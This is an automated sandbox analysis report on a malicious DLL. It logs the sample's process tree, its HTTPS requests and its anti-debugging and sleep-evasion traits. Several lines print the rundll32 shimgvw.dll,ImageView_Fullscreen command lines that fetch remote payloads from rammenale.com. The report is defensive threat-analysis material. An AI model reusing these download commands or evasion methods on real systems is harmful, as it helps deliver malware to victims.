Windows Analysis Report
LLD5HDX0PS.dll

Overview

General Information

Sample name: LLD5HDX0PS.dll (renamed because original name is a hash value)
Original sample name: 4b74d5e09bca4898a782e938a8f9889b9ebadf8b0f14368bca90d9d0e68da472.dll
Analysis ID: 1500944
MD5: 030a68e321dec0e77b4698fccc5d54db
SHA1: 7b792a49fe27a298343ba26db8cac5ccb150ff89
SHA256: 4b74d5e09bca4898a782e938a8f9889b9ebadf8b0f14368bca90d9d0e68da472
Tags: dllrammenale-com

Detection

Score: 84
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Sigma detected: Execute DLL with spoofed extension
Sigma detected: rundll32 run dll from internet
System process connects to network (likely due to code injection or exploit)
AI detected suspicious sample
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Potentially Suspicious Rundll32 Activity
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • loaddll32.exe (PID: 3224 cmdline: loaddll32.exe "C:\Users\user\Desktop\LLD5HDX0PS.dll" MD5: 51E6071F9CBA48E79F10C84515AAE618)
    • conhost.exe (PID: 2268 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 1488 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\LLD5HDX0PS.dll",#1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • rundll32.exe (PID: 2192 cmdline: rundll32.exe "C:\Users\user\Desktop\LLD5HDX0PS.dll",#1 MD5: 889B99C52A60DD49227C5E485A016679)
        • rundll32.exe (PID: 5308 cmdline: rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/aclog.txt MD5: 889B99C52A60DD49227C5E485A016679)
        • rundll32.exe (PID: 5332 cmdline: rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/regit.tmp MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 6092 cmdline: rundll32.exe C:\Users\user\Desktop\LLD5HDX0PS.dll,mydllmain MD5: 889B99C52A60DD49227C5E485A016679)
      • rundll32.exe (PID: 5960 cmdline: rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/aclog.txt MD5: 889B99C52A60DD49227C5E485A016679)
      • rundll32.exe (PID: 4988 cmdline: rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/regit.tmp MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 5432 cmdline: rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/aclog.txt MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 6136 cmdline: rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/regit.tmp MD5: 889B99C52A60DD49227C5E485A016679)
  • cleanup
No configs have been found
No yara matches
Source: Process started, Author: juju4, Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali (Nextron Systems): Data: Command: rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/aclog.txt, CommandLine: rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/aclog.txt, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: rundll32.exe C:\Users\user\Desktop\LLD5HDX0PS.dll,mydllmain, ParentImage: C:\Windows\SysWOW64\rundll32.exe, ParentProcessId: 6092, ParentProcessName: rundll32.exe, ProcessCommandLine: rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/aclog.txt, ProcessId: 5960, ProcessName: rundll32.exe

Data Obfuscation

Source: Process started, Author: Joe Security: Data: Command: rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/aclog.txt, CommandLine: rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/aclog.txt, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: rundll32.exe C:\Users\user\Desktop\LLD5HDX0PS.dll,mydllmain, ParentImage: C:\Windows\SysWOW64\rundll32.exe, ParentProcessId: 6092, ParentProcessName: rundll32.exe, ProcessCommandLine: rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/aclog.txt, ProcessId: 5960, ProcessName: rundll32.exe
No Suricata rule has matched

AV Detection

Source: LLD5HDX0PS.dll, Virustotal: Detection: 10%
Source: Submitted Sample, Integrated Neural Analysis Model: Matched 96.7% probability
Source: LLD5HDX0PS.dll, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
Source: unknown, HTTPS traffic detected: 131.153.206.231:443 -> 192.168.2.6:49712 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 131.153.206.231:443 -> 192.168.2.6:49714 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 131.153.206.231:443 -> 192.168.2.6:49715 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 131.153.206.231:443 -> 192.168.2.6:49713 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 131.153.206.231:443 -> 192.168.2.6:49717 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 131.153.206.231:443 -> 192.168.2.6:49716 version: TLS 1.2
Source: LLD5HDX0PS.dll, Static PE information: DYNAMIC_BASE, NX_COMPAT
Source: C:\Windows\System32\loaddll32.exe, Code function: 0_2_6BEE1B85 FindFirstFileW,_strlen,ExpandEnvironmentStringsW,CopyFileW,TerminateProcess,CloseHandle,CloseHandle,TerminateProcess,CloseHandle,CloseHandle,FindNextFileW,0_2_6BEE1B85
Source: C:\Windows\System32\loaddll32.exe, Code function: 0_2_6BEF38F4 FindFirstFileExW,0_2_6BEF38F4
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 3_2_6FE61B85 FindFirstFileW,_strlen,ExpandEnvironmentStringsW,CopyFileW,TerminateProcess,CloseHandle,CloseHandle,TerminateProcess,CloseHandle,CloseHandle,FindNextFileW,3_2_6FE61B85
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 3_2_6FE738F4 FindFirstFileExW,3_2_6FE738F4

Networking

Source: C:\Windows\SysWOW64\rundll32.exe, Network Connect: 131.153.206.231 443
Source: Joe Sandbox View, ASN Name: SS-ASHUS SS-ASHUS
Source: Joe Sandbox View, JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: global traffic, HTTP traffic detected:
  GET /for2/regit.tmp HTTP/1.1
  Accept: */*
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
  Host: rammenale.com
  Connection: Keep-Alive
Source: global traffic, HTTP traffic detected:
  GET /for2/aclog.txt HTTP/1.1
  Accept: */*
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
  Host: rammenale.com
  Connection: Keep-Alive
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic, DNS traffic detected: DNS query: rammenale.com
Source: global traffic, HTTP traffic detected:
  HTTP/1.1 404 Not Found
  Connection: close
  cache-control: private, no-cache, no-store, must-revalidate, max-age=0
  pragma: no-cache
  content-type: text/html
  content-length: 1251
  date: Thu, 29 Aug 2024 04:53:05 GMT
  server: LiteSpeed
  alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
Source: rundll32.exe, 00000008.00000002.3374164503.0000000007B53000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.Dc.
Source: rundll32.exe, 00000005.00000002.3372854058.0000000008AC4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3372962854.000000000813B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000002.3373357071.0000000008F96000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3373542181.00000000091FC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3372381342.0000000008833000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
Source: rundll32.exe, 00000005.00000002.3372854058.0000000008AAE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3372962854.000000000810D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000002.3374164503.0000000007B1D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000002.3373357071.0000000008F7E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3373542181.00000000091DA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3372381342.000000000881B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3372381342.0000000008802000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/
Source: rundll32.exe, 00000005.00000002.3372854058.0000000008AAE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/-H
Source: rundll32.exe, 00000007.00000002.3372962854.000000000810D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/2.168.2.6
Source: rundll32.exe, 00000008.00000002.3374164503.0000000007B1D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3373542181.00000000091DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/7
Source: rundll32.exe, 0000000D.00000002.3372381342.0000000008802000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/_T
Source: rundll32.exe, 0000000D.00000002.3372381342.0000000008863000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/fo
Source: rundll32.exe, 0000000C.00000002.3373542181.0000000009221000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/aclog
Source: rundll32.exe, 0000000C.00000002.3373542181.0000000009221000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3373542181.00000000091FC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3373542181.00000000091D7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3373542181.0000000009209000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3369493253.00000000034F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/aclog.txt
Source: rundll32.exe, 00000007.00000002.3369345966.0000000000C99000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/aclog.txt$
Source: rundll32.exe, 00000007.00000002.3372962854.000000000816B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/aclog.txt)
Source: rundll32.exe, 00000005.00000002.3372854058.0000000008AF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/aclog.txt2
Source: rundll32.exe, 0000000C.00000002.3373542181.00000000091FC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3373542181.0000000009209000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/aclog.txt4
Source: rundll32.exe, 00000005.00000002.3372854058.0000000008AC4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/aclog.txt4#
Source: rundll32.exe, 00000007.00000002.3372962854.000000000816B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/aclog.txt44
Source: rundll32.exe, 00000005.00000002.3372854058.0000000008AC4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/aclog.txt4G
Source: rundll32.exe, 00000005.00000002.3372854058.0000000008AC4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/aclog.txt4P
Source: rundll32.exe, 0000000C.00000002.3373542181.00000000091FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/aclog.txt4W
Source: rundll32.exe, 00000005.00000002.3372854058.0000000008AC4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/aclog.txt4X
Source: rundll32.exe, 00000007.00000002.3372962854.000000000816B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/aclog.txt4h
Source: rundll32.exe, 00000005.00000002.3372854058.0000000008A93000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3372962854.000000000810D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/aclog.txt6634-1003
Source: rundll32.exe, 0000000C.00000002.3369493253.000000000343A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/aclog.txt6634-1003.mun
Source: rundll32.exe, 0000000C.00000002.3373542181.0000000009221000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/aclog.txt9
Source: rundll32.exe, 00000005.00000002.3370723210.0000000003050000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3370922957.0000000003080000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3371348346.0000000003700000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/aclog.txt:
Source: rundll32.exe, 00000007.00000002.3369345966.0000000000C99000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/aclog.txtA
Source: rundll32.exe, 00000005.00000002.3369497741.0000000000D51000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3369493253.000000000343A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/aclog.txtC
Source: rundll32.exe, 00000005.00000002.3369497741.0000000000C90000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.3369351939.0000000000BF0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3369202584.0000000000B20000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3369345966.0000000000BE0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3369493253.0000000003430000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3369283677.0000000003300000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/aclog.txtC:
Source: rundll32.exe, 00000005.00000002.3369497741.0000000000C9A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/aclog.txtF2
Source: rundll32.exe, 0000000C.00000002.3369493253.00000000034F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/aclog.txtI
Source: rundll32.exe, 0000000C.00000002.3369493253.000000000343A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/aclog.txtJ
Source: rundll32.exe, 00000005.00000002.3372854058.0000000008A93000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/aclog.txtM3
Source: rundll32.exe, 00000007.00000002.3372962854.000000000816B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3372962854.0000000008123000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/aclog.txtP
Source: rundll32.exe, 0000000D.00000002.3371682679.0000000004D3A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3369386552.0000000000AA0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3369386552.00000000009E0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3372381342.0000000008817000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3371682679.0000000004D52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3369386552.00000000009EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmp
Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
Source: unknownHTTPS traffic detected: 131.153.206.231:443 -> 192.168.2.6:49712 version: TLS 1.2
Source: unknownHTTPS traffic detected: 131.153.206.231:443 -> 192.168.2.6:49714 version: TLS 1.2
Source: unknownHTTPS traffic detected: 131.153.206.231:443 -> 192.168.2.6:49715 version: TLS 1.2
Source: unknownHTTPS traffic detected: 131.153.206.231:443 -> 192.168.2.6:49713 version: TLS 1.2
Source: unknownHTTPS traffic detected: 131.153.206.231:443 -> 192.168.2.6:49717 version: TLS 1.2
Source: unknownHTTPS traffic detected: 131.153.206.231:443 -> 192.168.2.6:49716 version: TLS 1.2
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6BEEB3BD0_2_6BEEB3BD
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6BEF612B0_2_6BEF612B
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6BEFB8690_2_6BEFB869
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6BEEB07B0_2_6BEEB07B
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6BEEB71C0_2_6BEEB71C
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6BEF5C800_2_6BEF5C80
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6FE6B71C3_2_6FE6B71C
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6FE75C803_2_6FE75C80
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6FE6B3BD3_2_6FE6B3BD
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6FE7612B3_2_6FE7612B
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6FE7B8693_2_6FE7B869
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6FE6B07B3_2_6FE6B07B
Source: C:\Windows\System32\loaddll32.exeCode function: String function: 6BEE5570 appears 44 times
Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 6FE65570 appears 44 times
Source: LLD5HDX0PS.dllStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
Source: classification engineClassification label: mal84.evad.winDLL@20/0@1/1
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2268:120:WilError_03
Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\LLD5HDX0PS.dll,mydllmain
Source: LLD5HDX0PS.dllVirustotal: Detection: 10%
Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\LLD5HDX0PS.dll"
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\LLD5HDX0PS.dll",#1
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\LLD5HDX0PS.dll,mydllmain
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\LLD5HDX0PS.dll",#1
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/aclog.txt
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/aclog.txt
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/regit.tmp
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/regit.tmp
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/aclog.txt
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/regit.tmp
Source: C:\Windows\System32\loaddll32.exeSection loaded: apphelp.dll
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dll
Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{FBF23B40-E3F0-101B-8488-00AA003E56F8}\InProcServer32
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: LLD5HDX0PS.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6BEFBF81 push ecx; ret 0_2_6BEFBF94
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6BEFFD0D push esi; ret 0_2_6BEFFD16
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6FE7BF81 push ecx; ret 3_2_6FE7BF94
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6FE7FD0D push esi; ret 3_2_6FE7FD16
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00C0358B push edx; iretd 4_2_00C0358C
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00C02D93 push edx; iretd 4_2_00C02D94
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00C0321B push edx; iretd 4_2_00C0321C
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00C02E7B push edx; iretd 4_2_00C02E7C
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_04D4E842 push 73A07743h; retf 0000h5_2_04D4E91A
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00E5CF3C push esp; iretd 8_2_00E5CF3D
Source: initial sampleStatic PE information: section name: UPX0
Source: initial sampleStatic PE information: section name: UPX1
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\loaddll32.exeAPI coverage: 9.7 %
Source: C:\Windows\SysWOW64\rundll32.exeAPI coverage: 8.7 %
Source: C:\Windows\SysWOW64\rundll32.exe TID: 6044Thread sleep time: -30000s >= -30000s
Source: C:\Windows\SysWOW64\rundll32.exe TID: 6136Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6BEE1B85 FindFirstFileW,_strlen,ExpandEnvironmentStringsW,CopyFileW,TerminateProcess,CloseHandle,CloseHandle,TerminateProcess,CloseHandle,CloseHandle,FindNextFileW,0_2_6BEE1B85
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6BEF38F4 FindFirstFileExW,0_2_6BEF38F4
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6FE61B85 FindFirstFileW,_strlen,ExpandEnvironmentStringsW,CopyFileW,TerminateProcess,CloseHandle,CloseHandle,TerminateProcess,CloseHandle,CloseHandle,FindNextFileW,3_2_6FE61B85
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6FE738F4 FindFirstFileExW,3_2_6FE738F4
Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 30000
Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 30000
Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 30000
Source: rundll32.exe, 00000008.00000002.3374164503.0000000007B07000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWX
Source: rundll32.exe, 00000007.00000002.3372962854.0000000008128000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW9
Source: rundll32.exe, 00000005.00000002.3372854058.0000000008AAE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.3372854058.0000000008ADF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3372962854.0000000008128000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3372962854.0000000008151000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000002.3374164503.0000000007B3D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000002.3374164503.0000000007B07000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000002.3373357071.0000000008FB1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000002.3373357071.0000000008F7E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3373542181.00000000091DA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3373542181.0000000009209000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3372381342.000000000884C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: rundll32.exe, 0000000C.00000002.3373542181.00000000091DA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWH
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6BEE53EE IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6BEE53EE
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6BEF4AF5 GetProcessHeap,0_2_6BEF4AF5
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6BEE53EE IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6BEE53EE
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6BEE4EDC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_6BEE4EDC
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6BEEDCFD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6BEEDCFD
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6FE64EDC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_6FE64EDC
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6FE6DCFD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_6FE6DCFD
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6FE653EE IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_6FE653EE

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 131.153.206.231 443
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\LLD5HDX0PS.dll",#1
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6BEE55EB cpuid 0_2_6BEE55EB
